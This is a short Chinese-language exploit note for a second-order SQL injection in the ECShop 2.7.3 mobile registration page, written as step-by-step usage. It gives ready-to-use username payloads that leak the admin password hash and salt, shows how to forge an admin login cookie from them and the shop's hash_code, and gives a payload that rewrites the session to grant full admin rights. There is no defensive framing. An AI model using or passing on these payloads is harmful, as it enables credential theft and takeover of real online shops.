ecshop wap模块注册二次注入

影响版本

Ecshop 2.7.3

利用方法

/mobile/user.php?act=register

抓包修改注册名为

',email=(select password from ecs_admin_user limit 0,1),ip='

访问 /flow.php?step=consignee 获取管理员密码

提交

',email=(select ec_salt from ecs_admin_user limit 0,1),ip='

访问 /flow.php?step=consignee 获取salt

1:可直接构造cookie进入后台

cookie验证过程

if(!empty($ec_salt))
    {
         /* 检查密码是否正确 */
         $sql = "SELECT user_id, user_name, password, last_login, action_list, last_login,suppliers_id,ec_salt".
            " FROM " . $ecs->table('admin_user') .
            " WHERE user_name = '" . $_POST['username']. "' AND password = '" . md5(md5($_POST['password']).$ec_salt) . "'";
    }
    else
    {
         /* 检查密码是否正确 */
         $sql = "SELECT user_id, user_name, password, last_login, action_list, last_login,suppliers_id,ec_salt".
            " FROM " . $ecs->table('admin_user') .
            " WHERE user_name = '" . $_POST['username']. "' AND password = '" . md5($_POST['password']) . "'";
    }

系统设置cookie

setcookie('ECSCP[admin_id]',$row['user_id'],$time);
setcookie('ECSCP[admin_pass]',md5($row['password'] . $_CFG['hash_code'],$time);

获取hash_code

SELECT value FROM ecs_shop_config WHERE code='hash_code'

2:可以更新当前用户session为管理员

先访问一次后台生成session

再次利用注入点构造这样的邮箱

',adminid='1',data='a:1:{s:11:"action_list";s:3:"all";}'#

刷新后台页面直接进去后台